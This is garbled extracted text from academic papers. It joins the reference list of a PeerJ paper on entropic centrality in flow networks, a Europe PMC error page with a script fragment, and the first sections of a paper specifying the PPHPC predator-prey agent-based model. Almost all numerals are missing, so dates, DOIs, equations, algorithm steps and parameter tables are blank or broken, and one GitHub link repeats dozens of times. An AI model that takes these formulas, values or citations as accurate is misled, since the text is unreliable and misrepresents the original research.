extrapolated from the view point of borgatti ( ), which advocates to use path based centrality for transfer type of flow, and not eigenvector based centralities, which are best suited for duplication. this indicates that the new entropic centrality provides novelty not only in the principled manner in which it captures the phenomenon of divisible flows, but also in terms of the results and associated insights obtained from it. oggier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. additional information and declarations funding the work of phetsouvanh silivanxay was supported by a ntu singapore scholarship for doing his phd. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: ntu singapore scholarship. competing interests anwitaman datta is an academic editor for peerj. author contributions • frédérique oggier conceived and designed the experiments, performed the experiments, analyzed the data, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. • silivanxay phetsouvanh performed the experiments, prepared figures and/or tables, performed the computation work, approved the final draft. • anwitaman datta conceived and designed the experiments, analyzed the data, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. data availability the following information was supplied regarding data availability: the tehran stock exchange dataset came from dastkhan h, gharneh ns. . determination of systematically important companies with cross-shareholding network analysis: a case study from an emerging market. international journal of financial studies ( ): doi . /ijfs and the authors can be contacted at nshams@aut.ac.ir for the dataset. the bitcoin dataset from the bitcoin transactions log is available at oggier, frederique elise; phetsouvanh, silivanxay; datta, anwitaman, , ‘‘a node directed weighted bitcoin address subgraph’’, . /n /iepbxv, dr-ntu (data), v . the maine airport network dataset is available at oggier, frederique elise; phetsouvanh, silivanxay; datta, anwitaman, , ‘‘maine airport network in january ’’, available at . /n /wm k w, dr-ntu (data), v . supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. oggier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /ijfs mailto:nshams@aut.ac.ir https://doi.org/ . /n /iepbxv https://doi.org/ . /n /wm k w http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. references benzi m, klymko c. . on the limiting behavior of parameter-dependent network centrality measures. siam journal on matrix analysis and applications ( ): . bonacich p. . factoring and weighting approaches to status scores and clique identification. journal of mathematics sociology : – doi . / x. . . bonacich p, lloyd p. . eigenvector-like measures of centrality for asymmetric relations. social networks ( ): – doi . /s - ( ) - . borgatti sp. . centrality and network flow. social networks : – doi . /j.socnet. . . . dastkhan h, gharneh ns. . determination of systematically important companies with cross-shareholding network analysis: a case study from an emerging market. international journal of financial studies ( ): – . estrada e. . the structure of complex networks: theory and applications. oxford: oxford university press. fan r, xu k, zhao j. . a gpu-based solution for fast calculation of the be- tweenness centrality in large weighted networks. peerj computer science :e doi . /peerj-cs. . iannelli f, mariani ms, sokolov im. . influencers identification in complex networks through reaction-diffusion dynamics. physical review e : . katz l. . a new status index derived from sociometric analysis. psychometrika ( ): – . kendall mg. . a new measure of rank correlation. biometrika ( – ): – doi . /biomet/ . - . . kondor d, pósfai m, csabai i, vattay g. . do the rich get richer? an empirical analysis of the bitcoin transaction network. plos one ( ):e . migliore m, martorana v, sciortino f. . an algorithm to find all paths be- tween two nodes in a graph. journal of computational physics : – doi . / - ( ) -s. nakamoto s. . bitcoin: a peer-to-peer electronic cash system. newman mej. . mathematics of networks. in: the new palgrave dictionary of eco- nomics. london: palgrave macmillan uk doi . / - - - - _ - . nikolaev ag, razib r, kucheriya a. . on efficient use of entropy centrality for social network analysis and community detection. social networks : – . oggier f, phetsouvanh s, datta a. a. a node directed weighted bitcoin address subgraph. in: dataverse. doi . /n /iepbxv. oggier f, phetsouvanh s, datta a. b. maine airport network in january . in: dataverse. doi . /n /wm k w. oggier f, silivanxay p, datta a. . entropic centrality for non-atomic flow network. in: international symposium on information theory and its applications (isita). piscataway: ieee. oggier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / x. . http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /j.socnet. . . http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /biomet/ . - . http://dx.doi.org/ . / - ( ) -s http://dx.doi.org/ . / - - - - _ - http://dx.doi.org/ . /n /iepbxv http://dx.doi.org/ . /n /wm k w http://dx.doi.org/ . /peerj-cs. opsahl t, agneessens f, skvoretz j. . node centrality in weighted networks: generalizing degree and shortest paths. social networks ( ): – . page l, brin s, motwani r, winograd t. . the pagerank citation ranking: bringing order to the web. stanford: stanford infolab. phetsouvanh s, oggier f, datta a. . egret: extortion graph exploration techniques in the bitcoin network. in: ieee icdm workshop on data mining in networks (damnet). piscataway: ieee. schoch d, valente tw, brandes u. . correlations among centrality indices and a class of uniquely ranked graphs. social networks : – . tutzauer f. . entropy as a measure of centrality in networks characterized by path- transfer flow. social networks ( ): – . oggier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. wp-p m- .ebi.ac.uk params is empty sys_ exception wp-p m- .ebi.ac.uk no params is empty exception params is empty / / - : : if (typeof jquery === "undefined") document.write('[script type="text/javascript" src="/corehtml/pmc/jig/ . . /js/jig.min.js"][/script]'.replace(/\[/g,string.fromcharcode( )).replace(/\]/g,string.fromcharcode( ))); // // // window.name="mainwindow"; .pmc-wm {background:transparent repeat-y top left;background-image:url(/corehtml/pmc/pmcgifs/wm-nobrand.png);background-size: auto, contain} .print-view{display:block} page not available reason: the web page address (url) that you used may be incorrect. message id: (wp-p m- .ebi.ac.uk) time: / / : : if you need further help, please send an email to pmc. include the information from the box above in your message. otherwise, click on one of the following links to continue using pmc: search the complete pmc archive. browse the contents of a specific journal in pmc. find a specific article by its citation (journal, date, volume, first page, author or article title). http://europepmc.org/abstract/med/ towards a standard model for research in agent-based modeling and simulation submitted august accepted november published november corresponding author nuno fachada, nfachada@laseeb.org academic editor feng gu additional information and declarations can be found on page doi . /peerj-cs. copyright fachada et al. distributed under creative commons cc-by . open access towards a standard model for research in agent-based modeling and simulation nuno fachada , vitor v. lopes , rui c. martins and agostinho c. rosa institute for systems and robotics, larsys, instituto superior técnico, universidade de lisboa, lisboa, portugal universidad de las fuerzas armadas-espe, sangolquı́, ecuador life and health sciences research institute, school of health sciences, university of minho, braga, portugal abstract agent-based modeling (abm) is a bottom-up modeling approach, where each entity of the system being modeled is uniquely represented as an independent decision- making agent. abms are very sensitive to implementation details. thus, it is very easy to inadvertently introduce changes which modify model dynamics. such problems usually arise due to the lack of transparency in model descriptions, which constrains how models are assessed, implemented and replicated. in this paper, we present pphpc, a model which aims to serve as a standard in agent based modeling research, namely, but not limited to, conceptual model specification, statistical analysis of simulation output, model comparison and parallelization studies. this paper focuses on the first two aspects (conceptual model specification and statistical analysis of simulation output), also providing a canonical implementation of pphpc. the paper serves as a complete reference to the presented model, and can be used as a tutorial for simulation practitioners who wish to improve the way they communicate their abms. subjects agents and multi-agent systems, scientific computing and simulation, theory and formal methods keywords agent-based modeling, standard model, statistical analysis of simulation output, odd introduction agent-based modeling (abm) is a bottom-up modeling approach, where each entity of the system being modeled is uniquely represented as an independent decision-making agent. when prompted to act, each agent analyzes its current situation (e.g., what resources are available, what other agents are in the neighborhood), and acts appropriately, based on a set of rules. these rules express knowledge or theories about the respective low-level components. the global behavior of the system is the result from the simple, self-organized local relationships between the agents (fachada, ). as such, abm is a useful tool in simulating and exploring systems that can be modeled in terms of interactions between individual entities, e.g., biological cell cultures, ants foraging for food or military units in a battlefield (macal & north, ). in practice, abm can be considered a variation of discrete-event simulation, since state changes occur at specific points in time (law, ). how to cite this article fachada et al. ( ), towards a standard model for research in agent-based modeling and simulation. peerj comput. sci. :e ; doi . /peerj-cs. mailto:nfachada@laseeb.org https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. spatial agent-based models (sabms) are a subset of abms in which a spatial topology defines how agents interact (shook, wang & tang, ). for example, an agent may be limited to interact with agents located within a specific radius, or may only move to a near physical or geographical location (macal & north, ). sabms have been extensively used to study a range of phenomena in the biological and social sciences (isaac, ; shook, wang & tang, ). abms are very sensitive to implementation details: the impact that seemingly unimportant aspects such as data structures, algorithms, discrete time representation, floating point arithmetic or order of events can have on results is tremendous (wilensky & rand, ; merlone, sonnessa & terna, ). as such, it is very easy to inadvertently introduce changes which will alter model dynamics. these type of issues usually derive from a lack of transparency in model descriptions, which constrains how models are assessed and implemented (müller et al., ). conceptual models should be well specified and adequately described in order to be properly implemented and replicated (edmonds & hales, ; wilensky & rand, ). the odd protocol (overview, design concepts, details) is currently one of the most widely used templates for making model descriptions more understandable and complete, providing a comprehensive checklist that covers virtually all the key features that can define a model (grimm et al., ). it allows modelers to communicate their models using a natural language description within a prescriptive and hierarchical structure, aiding in model design and fostering in-depth model comprehension (müller et al., ). it is the recommended approach for documenting models in the comses net computational model library (rollins et al., ). however, müller et al. ( ) argue that no single model description standard can completely and throughly characterize a model by itself, suggesting that besides a structured natural language description such as odd, the availability of a model’s source code should be part of a minimum standard for model communication. furthermore, the odd protocol does not deal with models from a results or simulation output perspective, which means that an additional section for statistical analysis of results is often required. in practice, however, the situation is very different. while many abms have been published and simulation output analysis is a widely discussed subject matter (sargent, ; kelton, ; law, ; nakayama, ; law, ), comprehensive inquiries concerning the output of abm simulations are hard to find in the scientific literature. in this paper, we present pphpc (predator-prey for high-performance computing), a conceptual model which captures important characteristics of sabms, such as agent movement and local agent interactions. it aims to serve as a standard in agent based modeling research, and was designed with several goals in mind: . provide a basis for a tutorial on complete model specification and thorough simulation output analysis. . investigate statistical comparison strategies for model replication (fachada et al., a). fachada et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. . compare different implementations from a performance point of view, using different frameworks, programming languages, hardware and/or parallelization strategies, while maintaining statistical equivalence among implementations (fachada et al., b). . test the influence of different pseudo-random number generators (prngs) on the statistical accuracy of simulation output. this paper aims to fulfill the first of these goals, and is organized as follows. first, in ‘background,’ we review several paradigmatic abms, as well as model description and analysis. next, the ‘methodology’ section is divided into five subsections, in which we: (a) formalize the conceptual model using the odd protocol; (b) describe the canonical pphpc realization implemented with the netlogo abm toolkit (wilensky, ); (c) discuss how to select output focal measures; (d) explain how to collect and prepare data for statistical analysis; and, (e) propose how to analyze focal measures from a statistical point-of-view. in ‘results’, statistical analysis of output of the netlogo implementation is performed. a discussion on how these results can be utilized in additional investigations is undertaken in ‘discussion’. ‘conclusions’ provides a global outline of what was accomplished in this paper. background several abms have been used for the purpose of modeling tutorials and/or model analysis and replication. probably, the most well known standard abm is the “stupidmodel,” which consists of a series of pseudo-models of increasing complexity, ranging from simple moving agents to a full predator-prey-like model. it was developed by railsback, lytinen & grimm ( ) as a teaching tool and template for real applications, as it includes a set of features commonly used in abms of real systems. it has been used to address a number of questions, including the comparison of abm platforms (railsback, lytinen & jackson, ; lytinen & railsback, ), model parallelization (lysenko & d’souza, ; tang & wang, ), analysis of toolkit feasibility (standish, ) and/or creating models as compositions of micro-behaviors (kahn, ). the “stupidmodel” series has been criticized for having some atypical elements and ambiguities (lytinen & railsback, ), reasons which lead isaac ( ) to propose a reformulation to address these and other issues. however, its multiple versions and user-interface/visualization goals limit the series appeal as a pure computational model for the goals described in the introduction. other paradigmatic models which have been recurrently used, studied and replicated include sugarscape (epstein & axtell, ; axtell et al., ; bigbee, cioffi-revilla & luke, ; d’souza, lysenko & rahmani, ; lysenko & d’souza, ), heatbugs (wilensky, ; sallach & mellarkod, ; goldsby & pancerella, ), boids (reynolds, ; reynolds, ; goldsby & pancerella, ) and several interpretations of proto- typical predator-prey models (smith, ; hiebeler, ; wilensky, ; tatara et al., ; ottino-loffler, rand & wilensky, ; ginovart, ). nonetheless, there is a lack of formalization and in-depth statistical analysis of simulation output in most of these implementations, often leading to model assessment and replication difficulties (edmonds fachada et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. & hales, ; wilensky & rand, ). this might not come as a surprise, as most models are not implemented with replication in mind. many models are not adequately analyzed with respect to their output data, often due to improper design of simulation experiments. consequently, authors of such models can be at risk of making incorrect inferences about the system being studied (law, ). a number of papers and books have been published concerning the challenges, pitfalls and opportunities of using simulation models and adequately analyzing simulation output data. in one of the earliest articles on the subject, sargent ( ) demonstrates how to obtain point estimates and confidence intervals for steady state means of simulation output data using a number of different methodologies. later, law ( ) presented a state-of-the-art survey on statistical analyses for simulation output data, addressing issues such as start-up bias and determination of estimator accuracy. this survey was updated several times over the years, e.g., law ( ), where law discusses the duration of transient periods before steady state settles, as well as the number of replications required for achieving a specific level of estimator confidence. in kelton ( ), the author describes methods to help design the runs for simulation models and interpreting their output using statistical methods, also dealing with related problems such as model comparison, variance reduction or sensitivity estimation. a comprehensive exposition of these and other important topics of simulation research is presented in the several editions of “simulation modeling and analysis” by law and kelton, and its latest edition (law, ) is used as a starting point for the analysis described in ‘methodology’ and conducted in ‘results.’ methodology overview, design concepts and details of pphpc here we describe the pphpc model using the odd protocol (grimm et al., ). time-dependent state variables are represented with uppercase letters, while constant state variables and parameters are denoted by lowercase letters. the u(a,b) expression equates to a random integer within the closed interval [a,b] taken from the uniform distribution. purpose the purpose of pphpc is to serve as a standard model for studying and evaluating sabm implementation strategies. it is a realization of a predator-prey dynamic system, and captures important characteristics of sabms, such as agent movement and local agent interactions. the model can be implemented using substantially different approaches that ensure statistically equivalent qualitative results. implementations may differ in aspects such as the selected system architecture, choice of programming language and/or agent-based modeling framework, parallelization strategy, random number generator, and so forth. by comparing distinct pphpc implementations, valuable insights can be obtained on the computational and algorithmical design of sabms in general. fachada et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. table model state variables by entity. where applicable, the s and w designations correspond to prey (sheep) and predator (wolf ) agent types, respectively. entity state variable symbol range type t s,w energy e , ,... horizontal position in grid x , ,...,xenv − vertical position in grid y , ,...,yenv − energy gain from food gs, gw , ,... energy loss per turn ls, lw , ,... reproduction threshold rst , r w t , ,... agents reproduction probability rsp , r w p , ,..., horizontal position in grid x , ,...,xenv − vertical position in grid y , ,...,yenv − grid cells countdown c , ,...,cr horizontal size xenv , ,... vertical size yenv , ,...environment restart cr , ,... entities, state variables, scales the pphpc model is composed of three entity classes: agents, grid cells and environment. each of these entity classes is defined by a set of state variables, as shown in table . all state variables explicitly assume integer values to avoid issues with the handling of floating-point arithmetic on different programming languages and/or processor architectures. the t state variable defines the agent type, either s (sheep, i.e. prey) or w (wolf, i.e. predator). the only behavioral difference between the two types is in the feeding pattern: while prey consume passive cell-bound food, predators consume prey. other than that, prey and predators may have different values for other state variables, as denoted by the superscripts s and w. agents have an energy state variable, e, which increases by gs or gw when feeding, decreases by ls or lw when moving, and decreases by half when reproducing. when energy reaches zero, the agent is removed from the simulation. agents with energy higher than rst or r w t may reproduce with probability given by r s p or r w p . the grid position state variables, x and y , indicate which cell the agent is located in. there is no conceptual limit on the number of agents that can exist during the course of a simulation run. instances of the grid cell entity class can be thought of the place or neighborhood where agents act, namely where they try to feed and reproduce. agents can only interact with other agents and resources located in the same grid cell. grid cells have a fixed grid position, (x,y), and contain only one resource, cell-bound food (grass), which can be consumed by prey, and is represented by the countdown state variable c. the c state variable specifies the number of iterations left for the cell-bound food to become available. food becomes available when c = , and when a prey consumes it, c is set to cr . the set of all grid cells forms the environment entity, a toroidal square grid where the simulation takes place. the environment is defined by its size, (xenv,yenv), and by the restart parameter, cr . fachada et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. spatial extent is represented by the aforementioned square grid, of size (xenv,yenv), where xenv and yenv are positive integers. temporal extent is represented by a positive integer m, which represents the number of discrete simulation steps or iterations. spatial and temporal scales are merely virtual, i.e. they do not represent any real measure. process overview and scheduling algorithm describes the simulation schedule and its associated processes. execution starts with an initialization process, init(), where a predetermined number of agents are randomly placed in the simulation environment. cell-bound food is also initialized at this stage. after initialization, and to get the simulation state at iteration zero, outputs are gathered by the getstats() process. the scheduler then enters the main simulation loop, where each iteration is sub-divided into four steps: ( ) agent movement ; ( ) food growth in grid cells; ( ) agent actions ; and, ( ) gathering of simulation outputs. state variables algorithm main simulation algorithm. for loops can be processed in any order or in random order. in terms of expected dynamic behavior, the former means the order is not relevant, while the latter specifies loop iterations should be explicitly shuffled. : i() : gs() : i ← : for i <= m do : for each agent do ◃ any order : m() : end for : for each grid cell do ◃ any order : gf() : end for : for each agent do ◃ random order : a() : end for : gs() : i ← i+ : end for are asynchronously updated, i.e. they are assigned a new value as soon as this value is calculated by a process (e.g., when an agent gains energy by feeding). design concepts basic principles. the general concepts of this model are based on well studied predator- prey dynamics, initially through analytical approaches (lotka, ; volterra, ), and later using agent-based models (smith, ). however, pphpc is designed so that it can be correctly implemented using diverse computational approaches. realizations of this fachada et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. model can provide valuable information on how to better implement sabms on different computing architectures, namely parallel ones. in particular, they may shown the impact of different parallelization strategies on simulation performance. emergence. the model is characterized by oscillations in the population of both prey and predator, as well as in the available quantity of cell-bound food. typically, a peak of predator population occurs slightly after a peak in prey population size, while quantity of cell-bound food is approximately in “phase opposition” with the prey’s population size. sensing. agents can sense the presence of food in the grid cell in which they are currently located. this means different thing for prey and predators. prey agents can read the local grid cell c state variable, which if zero, means there is food available. predator agents can determine the presence of prey agents. interaction. agents interact with sources of food present in the grid cell they are located in. stochasticity. the following processes are random: (a) initialization of specific state variables; (b) agent movement; (c) the order in which agents act; and, (d) agent reproduction. observation. the following vector is collected in the getstats() process, where i refers to the current iteration: oi = (p s i ,p w i ,p c i ,e s i ,e w i ,ci) psi and p w i refer to the total prey and predator population counts, respectively, while p c i holds the quantity of available cell-bound food. e s i and e w i contain the mean energy of prey and predator populations. finally, ci refers to the mean value of the c state variable in all grid cells. initialization the initialization process begins by instantiating the environment entity, a toroidal square grid, and filling it with xenv × yenv grid cells. the initial value of the countdown state variable in each grid cell, c , is set according to eq. ( ), c =  u( ,cr), if c = , if c = , with c = u( , ). ( ) in other words, cell-bound food is initially available with % probability. if not available, the countdown state variable is set to a random value between and cr . the initial value of the state variables for each agent is determined according to eqs. ( ) and ( ). e = u( , g), with g ∈{g s ,gw} ( ) (x ,y ) =  u( ,xenv − ),u( ,yenv − )  . ( ) fachada et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. submodels as stated in process overview and scheduling, each iteration of the main simulation loop is sub-divided into four steps, described in the following paragraphs. move(). in step , agents move(), in any order, within a von neumann neighborhood, i.e. up, down, left, right or stay in the same cell, with equal probability. agents lose ls or lw units of energy when they move, even if they stay in the same cell; if energy reaches zero, the agent dies and is removed from the simulation. growfood(). in step , during the growfood() process, each grid cell checks if c = (meaning there is food available). if c > it is decremented by one unit. equation ( ) summarizes this process. ci = max(ci− − , ). ( ) act(). in step , agents act() in explicitly random order, i.e. the agent list should be shuffled before the agents have a chance to act. the act() process is composed of two sub-actions: tryeat() and tryreproduce(). the act() process is atomic, i.e. once called, both tryeat() and tryreproduce() must be performed; this implies that prey agents may be killed by predators before or after they have a chance of calling act(), but not during the call. tryeat(). agents can only interact with sources of food present in the grid cell they are located in. predator agents can kill and consume prey agents, removing them from the simulation. prey agents can consume cell-bound food, resetting the local grid cell c state variable to cr . a predator can consume one prey per iteration, and a prey can only be con- sumed by one predator. agents who act first claim the food resources available in the local grid cell. feeding is automatic: if the resource is there and no other agent has yet claimed it, the agent will consume it. moreover, only one prey can consume the local cell-bound food if available (i.e. if c = ). when an agent successfully feeds, its energy e is incremented by gs or gw, depending on whether the agent is a prey or a predator, respectively. tryreproduce(). if the agent’s energy, e, is above its species reproduction threshold, rst or r w t , then reproduction will occur with probability given by the species reproduction probability, rsp or r w p , as shown in algorithm . when an agent successfully reproduces, its energy is divided (using integer division) with its offspring. the offspring is placed in the same grid cell as his parent, but can only take part in the simulation in the next iteration. more specifically, newly born agents cannot act(), nor be acted upon. the latter implies that newly born prey cannot be consumed by predators in the current iteration. agents immediately update their energy if they successfully feed and/or reproduce. parameterization. model parameters can be qualitatively separated into size-related and dynamics-related parameters, as shown in table . although size-related parameters also influence model dynamics, this separation is useful for parameterizing simulations. fachada et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. algorithm agent reproduction. function tr() if e > rt then if u( , ) < rp then echild ← e/ ◃ integer division e ← e−echild na(t,echild,x,y ) end if end if end function table size-related and dynamics-related model parameters. type parameter symbol environment size xenv,yenv initial agent count ps ,p w size number of iterations m energy gain from food gs, gw energy loss per turn ls, lw reproduction threshold rst , r w t reproduction probability rsp , r w p dynamics cell food restart cr table a selection of initial model sizes. size xenv × yenv p s p w × × , × , , × , , , , × , , , . . . . . . . . . . . . concerning size-related parameters, more specifically, the grid size, we propose a base value of × , associated with prey and predators. different grid sizes should have proportionally assigned agent population sizes, as shown in table . in other words, there are no changes in the agent density nor the ratio between prey and predators. for the dynamics-related parameters, we propose two sets of parameters, table , which generate two distinct dynamics. the second parameter set typically yields more than twice the number of agents than the first parameter set. matching results with runs based on dis- tinct parameters is necessary in order to have a high degree of confidence in the similarity of different implementations (edmonds & hales, ). while many more combinations fachada et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. table dynamics-related parameter sets. parameter symbol set set prey energy gain from food gs prey energy loss p/turn ls prey reprod. threshold rst prey reprod. probability rsp predator energy gain from food gw predator energy loss p/turn lw predator reprod. threshold rwt predator reprod. probability rwp cell food restart cr of parameters can be experimented with this model, these two sets are the basis for testing and comparing pphpc implementations. we will refer to a combination of model size and parameter set as “size@set,” e.g., @ for model size , parameter set . while simulations of the pphpc model are essentially non-terminating, the number a non-terminating simulation is one for which there is no natural event to specify the length of a run (law, ). of iterations, m, is set to , , as it allows to analyze steady-state behavior for all the parameter combinations discussed here. a netlogo implementation netlogo is a well-documented programming language and modeling environment for abms, focused on both research and education. it is written in scala and java and runs on the java virtual machine (jvm). it uses a hybrid interpreter and compiler that partially compiles abm code to jvm bytecode (sondahl, tisue & wilensky, ). it comes with powerful built-in procedures and is relatively easy to learn, making abms more accessible to researchers without programming experience (martin et al., ). advantages of having a netlogo version include real-time visualization of simulation, pseudo-code like model descriptions, simplicity in changing and testing different model aspects and parameters, and command-line access for batch runs and cycling through different parameter sets, even allowing for multithreaded simultaneous execution of multiple runs. a netlogo reference implementation is also particularly important as a point of comparison with other abm platforms (isaac, ). the netlogo implementation of pphpc, fig. , is based on netlogo’s own wolf sheep predation model (wilensky, ), considerably modified to follow the odd discussed in the previous section. most netlogo models will have at least a setup procedure, to set up the initial state of the simulation, and a go procedure to make the model run continuously (wilensky, ). the init() and getstats() processes (lines and of algorithm ) are defined in the setup procedure, while the main simulation loop is implemented in the go procedure. the latter has an almost one-to-one relation with its pseudo-code counterpart in algorithm . by default, netlogo shuffles agents before issuing them orders, which fits naturally into the model odd. the implementation is available at https://github.com/ fakenmc/pphpc/tree/netlogo. fachada et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo http://dx.doi.org/ . /peerj-cs. figure netlogo implementation of the pphpc model. selection of focal measures in order to analyze the output of a simulation model from a statistical point-of-view, we should first select a set of focal measures (fms) which summarize each output. wilensky & rand ( ) use this approach in the context of statistical comparison of replicated models. typically, fms consist of long-term or steady-state means. however, being limited to analyze average system behavior can lead to incorrect conclusions (law, ). consequently, other measures such as proportions or extreme values can be used to assess model behavior. in any case, the selection of fms is an empirical exercise and is always dependent of the model under study. a few initial runs are usually required in order to perform this selection. for the pphpc model, the typical output of a simulation run is shown in fig. for size and both parameter sets. in both cases, all outputs undergo a transient stage and tend to stabilize after a certain number of iterations, entering steady-state. for other sizes, the situation is similar apart from a vertical scaling factor. outputs display pronounced extreme values in the transient stage, while circling around a long-term mean and approximately constant standard deviation in the steady-state phase. this standard deviation is an important feature of the outputs, as it marks the overall variability of the predator-prey cycles. having this under consideration, six statistics, described in table , were selected for each output. considering there are six outputs, a total of fms are analyzed for the pphpc model. fachada et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure typical model output for model size . other model sizes have outputs which are similar, apart from a vertical scaling factor. pi refers to total population, ei to mean energy and ci to mean value of the countdown state variable, c. superscript s relates to prey, w to predators, and c to cell-bound food. pci and ci are scaled for presentation purposes. (a) population, param. set . (b) energy, param. set . (c) population, param. set . (d) energy, param. set . table statistical summaries for each output x. xi is the value of x at iteration i, m denotes the last iteration, and l corresponds to the iteration separating the transient and steady-state stages. statistic description max ≤i≤m xi maximum value. arg max ≤i≤mxi iteration where maximum value occurs. min ≤i≤m xi minimum value. arg min ≤i≤mxi iteration where minimum value occurs. x ss = m i=l+ xi/(m− l) steady-state mean. sss =  m i=l+ (xi−xss) m−l− steady-state sample standard deviation. fachada et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. table values of a generic simulation output (under ‘iterations’) for n replications of m iterations each (plus iteration , i.e. the initial state), and the respective fms (under ‘focal measures’). values along columns are iid. rep. iterations focal measures x x ... x ,m− x ,m maxx arg maxx minx arg minx x ss s ss x x ... x ,m− x ,m maxx arg maxx minx arg minx x ss s ss . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . n xn xn ... xn,m− xn,m maxxn arg maxxn minxn arg minxn x ss n s ss n collecting and preparing data for statistical analysis let xj ,xj ,xj ,...,xjm be an output from the j th simulation run (rows under ‘iterations’ in table ). the xji’s are random variables that will, in general, be neither independent nor identically distributed (law, ), and as such, are not adequate to be used directly in many formulas from classical statistics (which are discussed in the next section). on the other hand, let x i,x i,...,xni be the observations of an output at iteration i for n runs (columns under ‘iterations’ in table ), where each run begins with the same initial conditions but uses a different stream of random numbers as a source of stochasticity. the xji’s will now be independent and identically distributed (iid) random variables, to which classical statistical analysis can be applied. however, individual values of the output x at some iteration i are not representative of x as a whole. thus, we use the selected fms as representative summaries of an output, as shown in table , under ‘focal measures.’ taken column-wise, the observations of the fms are iid (because they are obtained from iid replications), constituting a sample prone to statistical analysis. regarding steady-state measures, x ss and sss, care must be taken with initialization bias, which may cause substantial overestimation or underestimation of the long-term performance (sanchez, ). such problems can be avoided by discarding data obtained during the initial transient period, before the system reaches steady-state conditions. the simplest way of achieving this is to use a fixed truncation point, l, for all runs with the same initial conditions, selected such that: (a) it systematically occurs after the transient state; and, (b) it is associated with a round and clear value, which is easier to communicate (sanchez, ). law ( ) suggests the use of welch’s procedure (welch, ) in order to empirically determine l. let x , x , x , ..., xm be the averaged process taken column-wise from table (columns under ‘iterations’), such that xi = n j= xji/n for i= , ,...,m. the averaged process has the same transient mean curve as the original process, but its variance is reduced by a factor of n. a low-pass filter can be used to remove short-term fluctuations, leaving the long-term trend of interest, allowing us to visually determine a value of l for which the averaged process seems to have converged. a moving average approach can be used for filtering: xi(w) =   w s=−w xi+s w+ if i = w+ ,...,m−wi− s=−(i− ) xi+s i− if i = ,...,w ( ) fachada et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . 